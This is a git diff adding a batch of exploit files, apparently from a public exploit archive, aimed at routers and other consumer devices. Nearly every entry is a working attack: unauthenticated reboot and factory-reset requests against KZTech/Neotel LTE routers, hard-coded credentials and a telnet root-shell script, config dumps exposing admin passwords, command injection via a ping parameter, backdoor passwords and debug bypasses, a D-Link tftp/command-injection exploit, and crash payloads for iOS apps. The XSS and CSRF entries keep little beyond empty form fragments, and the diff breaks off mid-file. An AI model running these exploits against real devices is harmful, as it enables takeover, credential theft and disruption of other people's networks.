diff --git a/exploits/hardware/dos/49685.txt b/exploits/hardware/dos/49685.txt new file mode 100644 index 000000000..1d2d9a81b --- /dev/null +++ b/exploits/hardware/dos/49685.txt @@ -0,0 +1,68 @@ +# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Device Reboot (Unauthenticated) +# Date: 03.02.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk + +Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. +Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk + http://www.jatontec.com/products/show.php?itemid=258 + http://www.jatontech.com/CAT12.html#_pp=105_564 + http://www.kzbtech.com/AM3300V.html + https://neotel.mk/ostanati-paketi-2/ + +Affected version: Model | Firmware + -------|--------- + JT3500V | 2.0.1B1064 + JT3300V | 2.0.1B1047 + AM6200M | 2.0.0B3210 + AM6000N | 2.0.0B3042 + AM5000W | 2.0.0B3037 + AM4200M | 2.0.0B2996 + AM4100V | 2.0.0B2988 + AM3500MW | 2.0.0B1092 + AM3410V | 2.0.0B1085 + AM3300V | 2.0.0B1060 + AM3100E | 2.0.0B981 + AM3100V | 2.0.0B946 + AM3000M | 2.0.0B21 + KZ7621U | 2.0.0B14 + KZ3220M | 2.0.0B04 + KZ3120R | 2.0.0B01 + +Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi +& VoIP CPE product specially designed to enable quick and easy +LTE fixed data service deployment for residential and SOHO customers. +It provides high speed LAN, Wi-Fi and VoIP integrated services +to end users who need both bandwidth and multi-media data service +in residential homes or enterprises. The device has 2 Gigabit LAN +ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and +CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing +and firewall software for security. It provides an effective +all-in-one solution to SOHO or residential customers. It can +deliver up to 1Gbps max data throughput which can be very +competitive to wired broadband access service. + +Desc: The device allows unauthenticated attackers to restart the +device with an HTTP GET request to /goform/RestartDevice page. + +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + Linux 2.6.36+ (mips) + Mediatek APSoC SDK v4.3.1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5643 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5643.php + + +03.02.2021 + +-- + + +$ curl -sk https://192.168.1.1/goform/RestartDevice +success +$ \ No newline at end of file diff --git a/exploits/hardware/remote/49682.txt b/exploits/hardware/remote/49682.txt new file mode 100644 index 000000000..8639bb59d --- /dev/null +++ b/exploits/hardware/remote/49682.txt @@ -0,0 +1,92 @@ +# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Hard coded Credentials Shell Access +# Date: 03.02.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk + +Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. +Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk + http://www.jatontec.com/products/show.php?itemid=258 + http://www.jatontech.com/CAT12.html#_pp=105_564 + http://www.kzbtech.com/AM3300V.html + https://neotel.mk/ostanati-paketi-2/ + +Affected version: Model | Firmware + -------|--------- + JT3500V | 2.0.1B1064 + JT3300V | 2.0.1B1047 + AM6200M | 2.0.0B3210 + AM6000N | 2.0.0B3042 + AM5000W | 2.0.0B3037 + AM4200M | 2.0.0B2996 + AM4100V | 2.0.0B2988 + AM3500MW | 2.0.0B1092 + AM3410V | 2.0.0B1085 + AM3300V | 2.0.0B1060 + AM3100E | 2.0.0B981 + AM3100V | 2.0.0B946 + AM3000M | 2.0.0B21 + KZ7621U | 2.0.0B14 + KZ3220M | 2.0.0B04 + KZ3120R | 2.0.0B01 + +Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi +& VoIP CPE product specially designed to enable quick and easy +LTE fixed data service deployment for residential and SOHO customers. +It provides high speed LAN, Wi-Fi and VoIP integrated services +to end users who need both bandwidth and multi-media data service +in residential homes or enterprises. The device has 2 Gigabit LAN +ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and +CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing +and firewall software for security. It provides an effective +all-in-one solution to SOHO or residential customers. It can +deliver up to 1Gbps max data throughput which can be very +competitive to wired broadband access service. + +Desc: The device utilizes hard-coded credentials within its Linux +distribution image. These sets of credentials are never exposed to +the end-user and cannot be changed through any normal operation of +the router. + +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + Linux 2.6.36+ (mips) + Mediatek APSoC SDK v4.3.1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5637 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5637.php + + +03.02.2021 + +-- + + +Default web creds: +------------------ +admin:admin123 +user:user123 + +Telnet/SSH access: +------------------ +admin:root123 + +=== + +import telnetlib + +host="192.168.1.1" +user="admin" +password="root123" +s=telnetlib.Telnet(host) +s.read_until(b"CPE login: ") +s.write(user.encode('ascii') + b"\n") +s.read_until(b"Password: ") +s.write(password.encode('ascii') + b"\n") +s.write(b"busybox\n") +print(s.read_all().decode('ascii')) +s.mt_interact() +s.close() \ No newline at end of file diff --git a/exploits/hardware/remote/50034.txt b/exploits/hardware/remote/50034.txt new file mode 100644 index 000000000..828ab7f44 --- /dev/null +++ b/exploits/hardware/remote/50034.txt @@ -0,0 +1,109 @@ +# Exploit Title: Dlink DSL2750U - 'Reboot' Command Injection +# Date: 17-06-2021 +# Exploit Author: Mohammed Hadi (HadiMed) +# Vendor Homepage: https://me.dlink.com/consumer +# Software Link: https://dlinkmea.com/index.php/product/details?det=c0lvN0JoeVVhSXh4TVhjTnd1OUpUUT09 Version: ME_1.16 +# Tested on: firmware GAN9.ET235B-B-DL-DSL2750U-R5B028-ME.EN_2T2R* +# https://github.com/HadiMed/firmware-analysis/tree/main/DSL-2750U%20(firmware%20version%201.6) + +### + +#!/bin/bash + +# Exploit by HadiMed + +# Takes advantage of the tftp server that accepts the cfg file blindly +echo -ne "\n" +echo "Exploiting Dlink DSL-2750u version 1.6" +echo -ne "\n\n" + +# Sending the payload +echo -ne "binary\nput cfg.xml\nquit" | tftp 192.168.1.1 +echo -ne "\n" + +echo "File uploaded Successfully" +echo "Waiting for router to restart" + +sleep 180 # approximate time for router to restart + +python3 exploit.py + +### + +import requests + +# HTTP request looks like this +''' +POST /cgi-bin/webproc HTTP/1.1 +Host: 192.168.1.1 +Content-Length: 175 +Cache-Control: max-age=0 +Upgrade-Insecure-Requests: 1 +Origin: http://192.168.1.1 +Content-Type: application/x-www-form-urlencoded +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Referer: http://192.168.1.1/cgi-bin/webproc +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 +Cookie: sessionid=deadbeef; language=en_us; sys_UserName=user; sessionid=634cdf91 +Connection: close + +getpage=html%2Findex.html&errorpage=html%2Fmain.html&var%3Amenu=setup&var%3Apage=wizard&obj-action=auth&%3Ausername=user&%3Apassword=user&%3Aaction=login&%3Asessionid=634cdf91 +''' + +# 1 Getting a session id + +# password and username crafted by me on the cfg.xml file + +username = "pwned" +password= "pwned" + + +# acually the client set the sessionid in condition that the password and username are correct + +Cookie="sessionid=deadbeef; language=en_us; sys_UserName=pwned; sessionid=deadbeef" +Contentty="application/x-www-form-urlencoded" +Referer="http://192.168.1.1/cgi-bin/webproc" +Contentlen="175" + +# Sending first request to set our session id +response = requests.post("http://192.168.1.1/cgi-bin/webproc", + headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen } +, + data={ "getpage":"html/index.html", + "errorpage":"html/main.html", + "var:menu" : "setup", + "var:page":"wizard", + "obj-action":"auth", + ":username":username, + ":password":password, + ":action":"login", + ":sessionid":"deadbeef" +} + ) + + +Referer = "http://192.168.1.1/cgi-bin/webupg" + +name = "mac" +cmd = "1;sleep${IFS}10;reboot;" + +Contentlen = str(len(name+cmd)+10) + +if response.status_code==302: + print("got sessionid=deadbeef !\n waiting for the reverse shell ...") + +# access cgi-bin/webupg +try : + response = requests.post("http://192.168.1.1/cgi-bin/webupg", + headers={"Cookie":Cookie , "Content-Type":Contentty , "Referer":Referer , "Content-Length":Contentlen } + ,data = {"name":name , "newmac":cmd} , timeout=0.0000000001 + +) + +except requests.exceptions.Timeout : + + print("done router will restart in 20 sec") + +print("Device restarted!") \ No newline at end of file diff --git a/exploits/hardware/webapps/49680.txt b/exploits/hardware/webapps/49680.txt new file mode 100644 index 000000000..d777856eb --- /dev/null +++ b/exploits/hardware/webapps/49680.txt @@ -0,0 +1,83 @@ +# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Command Injection (Authenticated) +# Date: 03.02.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk + +Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. +Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk + http://www.jatontec.com/products/show.php?itemid=258 + http://www.jatontech.com/CAT12.html#_pp=105_564 + http://www.kzbtech.com/AM3300V.html + https://neotel.mk/ostanati-paketi-2/ + +Affected version: Model | Firmware + -------|--------- + JT3500V | 2.0.1B1064 + JT3300V | 2.0.1B1047 + AM6200M | 2.0.0B3210 + AM6000N | 2.0.0B3042 + AM5000W | 2.0.0B3037 + AM4200M | 2.0.0B2996 + AM4100V | 2.0.0B2988 + AM3500MW | 2.0.0B1092 + AM3410V | 2.0.0B1085 + AM3300V | 2.0.0B1060 + AM3100E | 2.0.0B981 + AM3100V | 2.0.0B946 + AM3000M | 2.0.0B21 + KZ7621U | 2.0.0B14 + KZ3220M | 2.0.0B04 + KZ3120R | 2.0.0B01 + +Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi +& VoIP CPE product specially designed to enable quick and easy +LTE fixed data service deployment for residential and SOHO customers. +It provides high speed LAN, Wi-Fi and VoIP integrated services +to end users who need both bandwidth and multi-media data service +in residential homes or enterprises. The device has 2 Gigabit LAN +ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and +CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing +and firewall software for security. It provides an effective +all-in-one solution to SOHO or residential customers. It can +deliver up to 1Gbps max data throughput which can be very +competitive to wired broadband access service. + +Desc: The application suffers from an authenticated OS command +injection vulnerability. This can be exploited to inject and +execute arbitrary shell commands through the 'pingAddr' HTTP +POST parameter bypassing the injection protection filter. + +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + Linux 2.6.36+ (mips) + Mediatek APSoC SDK v4.3.1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5635 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5635.php + + +03.02.2021 + +-- + + +#JT3300V/AM3300V +lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \ + --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \ + -H "Cookie: kz_userid=admin:311139" \ + -H "X-Requested-With: XMLHttpRequest" +ping: bad address 'Linux' +lqwrm@metalgear:~/prive$ + + +#JT3500V +lqwrm@metalgear:~/prive$ curl http://192.168.1.1/goform/start_ping \ + --data "pingAddr=\$(uname)&pingCount=1&packetSize=32&pingTimeout=7" \ + -H "Cookie: uid=token:b24649a236d0e1951b2d2f16430dfb1b" \ + -H "X-Requested-With: XMLHttpRequest" +ping: bad address 'Linux' +lqwrm@metalgear:~/prive$ \ No newline at end of file diff --git a/exploits/hardware/webapps/49681.txt b/exploits/hardware/webapps/49681.txt new file mode 100644 index 000000000..968044764 --- /dev/null +++ b/exploits/hardware/webapps/49681.txt @@ -0,0 +1,89 @@ +# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Authentication Bypass +# Date: 03.02.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk + +Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. +Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk + http://www.jatontec.com/products/show.php?itemid=258 + http://www.jatontech.com/CAT12.html#_pp=105_564 + http://www.kzbtech.com/AM3300V.html + https://neotel.mk/ostanati-paketi-2/ + +Affected version: Model | Firmware + -------|--------- + JT3500V | 2.0.1B1064 + JT3300V | 2.0.1B1047 + AM6200M | 2.0.0B3210 + AM6000N | 2.0.0B3042 + AM5000W | 2.0.0B3037 + AM4200M | 2.0.0B2996 + AM4100V | 2.0.0B2988 + AM3500MW | 2.0.0B1092 + AM3410V | 2.0.0B1085 + AM3300V | 2.0.0B1060 + AM3100E | 2.0.0B981 + AM3100V | 2.0.0B946 + AM3000M | 2.0.0B21 + KZ7621U | 2.0.0B14 + KZ3220M | 2.0.0B04 + KZ3120R | 2.0.0B01 + +Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi +& VoIP CPE product specially designed to enable quick and easy +LTE fixed data service deployment for residential and SOHO customers. +It provides high speed LAN, Wi-Fi and VoIP integrated services +to end users who need both bandwidth and multi-media data service +in residential homes or enterprises. The device has 2 Gigabit LAN +ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and +CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing +and firewall software for security. It provides an effective +all-in-one solution to SOHO or residential customers. It can +deliver up to 1Gbps max data throughput which can be very +competitive to wired broadband access service. + +Desc: The application suffers from an authentication bypass +vulnerability. An unauthenticated attacker can disclose sensitive +and clear-text information resulting in authentication bypass by +downloading the configuration of the device and revealing the +admin password. + +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + Linux 2.6.36+ (mips) + Mediatek APSoC SDK v4.3.1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5636 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5636.php + + +03.02.2021 + +-- + + +$ curl -s \ + -o configtest.zlib \ # Default: config.dat + 'http://192.168.1.1:8080/cgi-bin/export_settings.cgi' ; \ + binwalk -e configtest.zlib ; \ + cd _configtest.zlib_extracted ; \ + strings * | grep -ni 'Login\|Password\|Telnet\|Guest' ; \ + # cat /tmp/nvramconfig/RT28060_CONFIG_VLAN \ # On device + cd .. + +3:Login=admin +4:Password=neotelwings +5:TelnetPwd=root123 +6:GuestId=user +7:GuestPassword=user123 +89:DDNSPassword= +239:auto_update_password= +279:Tr069_Password= +288:Tr069_ConnectionRequestPassword=admin +300:Tr069_STUNPassword= +339:telnetManagement=2 +$ \ No newline at end of file diff --git a/exploits/hardware/webapps/49683.txt b/exploits/hardware/webapps/49683.txt new file mode 100644 index 000000000..46bf530db --- /dev/null +++ b/exploits/hardware/webapps/49683.txt @@ -0,0 +1,124 @@ +# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Remote Code Execution +# Date: 03.02.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk + +Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. +Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk + http://www.jatontec.com/products/show.php?itemid=258 + http://www.jatontech.com/CAT12.html#_pp=105_564 + http://www.kzbtech.com/AM3300V.html + https://neotel.mk/ostanati-paketi-2/ + +Affected version: Model | Firmware + -------|--------- + JT3500V | 2.0.1B1064 + JT3300V | 2.0.1B1047 + AM6200M | 2.0.0B3210 + AM6000N | 2.0.0B3042 + AM5000W | 2.0.0B3037 + AM4200M | 2.0.0B2996 + AM4100V | 2.0.0B2988 + AM3500MW | 2.0.0B1092 + AM3410V | 2.0.0B1085 + AM3300V | 2.0.0B1060 + AM3100E | 2.0.0B981 + AM3100V | 2.0.0B946 + AM3000M | 2.0.0B21 + KZ7621U | 2.0.0B14 + KZ3220M | 2.0.0B04 + KZ3120R | 2.0.0B01 + +Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi +& VoIP CPE product specially designed to enable quick and easy +LTE fixed data service deployment for residential and SOHO customers. +It provides high speed LAN, Wi-Fi and VoIP integrated services +to end users who need both bandwidth and multi-media data service +in residential homes or enterprises. The device has 2 Gigabit LAN +ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and +CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing +and firewall software for security. It provides an effective +all-in-one solution to SOHO or residential customers. It can +deliver up to 1Gbps max data throughput which can be very +competitive to wired broadband access service. + +Desc: The device has several backdoors and hidden pages that +allow remote code execution, overwriting of the bootrom and +enabling debug mode. + +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + Linux 2.6.36+ (mips) + Mediatek APSoC SDK v4.3.1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5639 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5639.php + + +03.02.2021 + +-- + + +Older and newer models defer in backdoor code. +By navigating to /syscmd.html or /syscmd.asp pages +an attacker can authenticate and execute system +commands with highest privileges. + +Old models (syscmd.asp) password: super1234 + +Newer models (syscmd.html) password: md5(WAN_MAC+version): + +$ curl -k https://192.168.1.1/goform/getImgVersionInfo +{"currentImg":["1", "Y", "V2.0.0B3210"], "shadowImg":["0", "Y", "V2.0.0B04"]} + +... +pcVar6 = (char *)nvram_bufget(1,"WAN_MAC_ADDR"); + if (*pcVar6 == 0) { + pcVar6 = "6C:AD:EF:00:00:01"; + } + memset(acStack280,0,0x100); + sprintf(acStack280,"generate debug password : %s %s",pcVar6,"V2.0.0B3210"); + ... + psMd5Init(auStack112); + psMd5Update(auStack112,local_10,local_c); + psMd5Final(auStack112,uParm1); + return; +... + + +Another 2 backdoors exist using the websCheckCookie() and specific header strings. + +... + iVar2 = strncmp(acStack2268,"UPGRADE:927",0xb); + if (iVar2 != 0) { + return 0xffffffff; + } + if ((*(char **)(iParm1 + 0xdc) != (char *)0x0) && + (iVar2 = strncmp(*(char **)(iParm1 + 0xdc),"TONY@KZT",8), iVar2 != 0)) { + return 0xffffffff; + ... + if (iVar1 != 0) goto LAB_0047c304; +LAB_0047c32c: + WebsDbgLog(2,"[%s] UserAgent=%s, username=%s,command=%s","startSysCmd",__s1_00,__s1_01,__s1); +LAB_0047c35c: + __n = strlen(__s1); + if (__n == 0) { + snprintf(acStack1560,0x200,"cat /dev/null > %s","/var/system_command.log"); + WebsDbgLog(3,"[%s] %s","startSysCmd",acStack1560); + system(acStack1560); + websWrite(iParm1,"invalid command!"); + goto LAB_0047c3f8; + } +... + + +Bypass the backdoor password request and enable debug mode from within the web console: + +$('#div_check').modal('hide'); <--- syscmd.html + +g_password_check_alert.close(); <--- syscmd.asp \ No newline at end of file diff --git a/exploits/hardware/webapps/49684.txt b/exploits/hardware/webapps/49684.txt new file mode 100644 index 000000000..32978e15b --- /dev/null +++ b/exploits/hardware/webapps/49684.txt @@ -0,0 +1,72 @@ +# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Factory Reset (Unauthenticated) +# Date: 03.02.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk + +Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. +Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk + http://www.jatontec.com/products/show.php?itemid=258 + http://www.jatontech.com/CAT12.html#_pp=105_564 + http://www.kzbtech.com/AM3300V.html + https://neotel.mk/ostanati-paketi-2/ + +Affected version: Model | Firmware + -------|--------- + JT3500V | 2.0.1B1064 + JT3300V | 2.0.1B1047 + AM6200M | 2.0.0B3210 + AM6000N | 2.0.0B3042 + AM5000W | 2.0.0B3037 + AM4200M | 2.0.0B2996 + AM4100V | 2.0.0B2988 + AM3500MW | 2.0.0B1092 + AM3410V | 2.0.0B1085 + AM3300V | 2.0.0B1060 + AM3100E | 2.0.0B981 + AM3100V | 2.0.0B946 + AM3000M | 2.0.0B21 + KZ7621U | 2.0.0B14 + KZ3220M | 2.0.0B04 + KZ3120R | 2.0.0B01 + +Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi +& VoIP CPE product specially designed to enable quick and easy +LTE fixed data service deployment for residential and SOHO customers. +It provides high speed LAN, Wi-Fi and VoIP integrated services +to end users who need both bandwidth and multi-media data service +in residential homes or enterprises. The device has 2 Gigabit LAN +ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and +CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing +and firewall software for security. It provides an effective +all-in-one solution to SOHO or residential customers. It can +deliver up to 1Gbps max data throughput which can be very +competitive to wired broadband access service. + +Desc: The device allows unauthenticated attackers to visit the +unprotected /goform/LoadDefaultSettings endpoint and reset the +device to its factory default settings. Once the GET request is +made, the device will reboot with its default settings allowing +the attacker to bypass authentication and take full control of +the system. + +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + Linux 2.6.36+ (mips) + Mediatek APSoC SDK v4.3.1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5642 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5642.php + + +03.02.2021 + +-- + + +$ curl -sk https://192.168.1.1/goform/LoadDefaultSettings +success +$ \ No newline at end of file diff --git a/exploits/hardware/webapps/49686.txt b/exploits/hardware/webapps/49686.txt new file mode 100644 index 000000000..e5535f782 --- /dev/null +++ b/exploits/hardware/webapps/49686.txt @@ -0,0 +1,70 @@ +# Exploit Title: KZTech/JatonTec/Neotel JT3500V 4G LTE CPE 2.0.1 - Config Download (Unauthenticated) +# Date: 03.02.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: http://www.kzbtech.com http://www.jatontec.com https://www.neotel.mk + +Vendor: KZ Broadband Technologies, Ltd. | Jaton Technology, Ltd. +Product web page: http://www.kzbtech.com | http://www.jatontec.com | https://www.neotel.mk + http://www.jatontec.com/products/show.php?itemid=258 + http://www.jatontech.com/CAT12.html#_pp=105_564 + http://www.kzbtech.com/AM3300V.html + https://neotel.mk/ostanati-paketi-2/ + +Affected version: Model | Firmware + -------|--------- + JT3500V | 2.0.1B1064 + JT3300V | 2.0.1B1047 + AM6200M | 2.0.0B3210 + AM6000N | 2.0.0B3042 + AM5000W | 2.0.0B3037 + AM4200M | 2.0.0B2996 + AM4100V | 2.0.0B2988 + AM3500MW | 2.0.0B1092 + AM3410V | 2.0.0B1085 + AM3300V | 2.0.0B1060 + AM3100E | 2.0.0B981 + AM3100V | 2.0.0B946 + AM3000M | 2.0.0B21 + KZ7621U | 2.0.0B14 + KZ3220M | 2.0.0B04 + KZ3120R | 2.0.0B01 + +Summary: JT3500V is a most advanced LTE-A Pro CAT12 indoor Wi-Fi +& VoIP CPE product specially designed to enable quick and easy +LTE fixed data service deployment for residential and SOHO customers. +It provides high speed LAN, Wi-Fi and VoIP integrated services +to end users who need both bandwidth and multi-media data service +in residential homes or enterprises. The device has 2 Gigabit LAN +ports, 1 RJ11 analog phone port, high performance 4x4 MIMO and +CA capabilities, 802.11b/g/n/ac dual band Wi-Fi, advanced routing +and firewall software for security. It provides an effective +all-in-one solution to SOHO or residential customers. It can +deliver up to 1Gbps max data throughput which can be very +competitive to wired broadband access service. + +Desc: JT3500V is vulnerable to unauthenticated configuration disclosure +when direct object reference is made to the export_settings.cgi file +using an HTTP GET request. This will enable the attacker to disclose +sensitive information and help her in authentication bypass, privilege +escalation and full system access. + +Tested on: GoAhead-Webs/2.5.0 PeerSec-MatrixSSL/3.1.3-OPEN + Linux 2.6.36+ (mips) + Mediatek APSoC SDK v4.3.1.0 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5644 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5644.php + + +03.02.2021 + +-- + + +$ curl -sk -O https://192.168.1.1/cgi-bin/export_settings.cgi; ls -alsth config.dat +8.0K -rw-rw-r-- 1 teppei teppei 5.5K Feb 4 11:31 config.dat \ No newline at end of file diff --git a/exploits/hardware/webapps/49800.html b/exploits/hardware/webapps/49800.html new file mode 100644 index 000000000..041cb570b --- /dev/null +++ b/exploits/hardware/webapps/49800.html @@ -0,0 +1,112 @@ +# Exploit Title: Sipwise C5 NGCP CSC - 'Multiple' Stored/Reflected Cross-Site Scripting (XSS) +# Date: 13.04.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.sipwise.com + +Sipwise C5 NGCP CSC Multiple Stored/Reflected XSS Vulnerabilities + + +Vendor: Sipwise GmbH +Product web page: https://www.sipwise.com +Affected version: <=CE_m39.3.1 + NGCP www_admin version 3.6.7 + +Summary: Sipwise C5 (also known as NGCP - the Next Generation Communication Platform) +is a SIP-based Open Source Class 5 VoIP soft-switch platform that allows you to provide +rich telephony services. It offers a wide range of features (e.g. call forwarding, voicemail, +conferencing etc.) that can be configured by end users in the self-care web interface. +For operators, it offers a web-based administrative panel that allows them to configure +subscribers, SIP peerings, billing profiles, and other entities. The administrative web +panel also shows the real-time statistics for the whole system. For tight integration +into existing infrastructures, Sipwise C5 provides a powerful REST API interface. + +Desc: Sipwise software platform suffers from multiple authenticated stored and reflected +cross-site scripting vulnerabilities when input passed via several parameters to several +scripts is not properly sanitized before being returned to the user. This can be exploited +to execute arbitrary HTML and script code in a user's browser session in context of an +affected site. + +Tested on: Apache/2.2.22 (Debian) + Apache/2.2.16 (Debian) + nginx + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2021-5648 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5648.php + + +13.04.2021 + +-- + + +Stored XSS (POST tsetname): +--------------------------- + + + +
+ ' /> + + + +
+ + + + +Stored XSS (POST firstname, lastname, company): +----------------------------------------------- + + + +
+ + + + + + + + + + + + + +
+ + + + +Reflected XSS (GET lang): +------------------------- + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/hardware/webapps/50338.txt b/exploits/hardware/webapps/50338.txt new file mode 100644 index 000000000..528d7d010 --- /dev/null +++ b/exploits/hardware/webapps/50338.txt @@ -0,0 +1,108 @@ +# Exploit Title: FatPipe Networks WARP/IPVPN/MPVPN 10.2.2 - 'Add Admin' Cross-Site Request Forgery (CSRF) +# Date: 25.07.2021 +# Exploit Author: LiquidWorm +# Vendor Homepage: https://www.fatpipeinc.com + + + + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/ios/dos/49957.py b/exploits/ios/dos/49957.py new file mode 100755 index 000000000..5e8d8e573 --- /dev/null +++ b/exploits/ios/dos/49957.py @@ -0,0 +1,35 @@ +# Exploit Title: Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) +# Date: 06-04-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/sticky-notes-color-widgets/id1476063010 +# Version: 1.4.2 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/49978.py b/exploits/ios/dos/49978.py new file mode 100755 index 000000000..641bdc839 --- /dev/null +++ b/exploits/ios/dos/49978.py @@ -0,0 +1,35 @@ +# Exploit Title: Sticky Notes Widget Version 3.0.6 - Denial of Service (PoC) +# Date: 06-07-2021 +# Author: Geovanni Ruiz +# Download Link: https://apps.apple.com/us/app/sticky-notes-widget/id1499269608 +# Version: 3.0.6 +# Category: DoS (iOS) + +##### Vulnerability ##### + +Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: + +# STEPS # +# Open the program. +# Create a new Note. +# Run the python exploit script payload.py, it will create a new payload.txt file +# Copy the content of the file "payload.txt" +# Paste the content from payload.txt twice in the new Note. +# Crashed + +Successful exploitation will cause the application to stop working. + +I have been able to test this exploit against iOS 14.2. + +##### PoC ##### +--> payload.py <-- +#!/usr/bin/env python +buffer = "\x41" * 350000 + +try: + f = open("payload.txt","w") + f.write(buffer) + f.close() + print ("File created") +except: + print ("File cannot be created") \ No newline at end of file diff --git a/exploits/ios/dos/50001.py b/exploits/ios/dos/50001.py new file mode 100755 index 000000000..a6fee8b92 --- /dev/null +++ 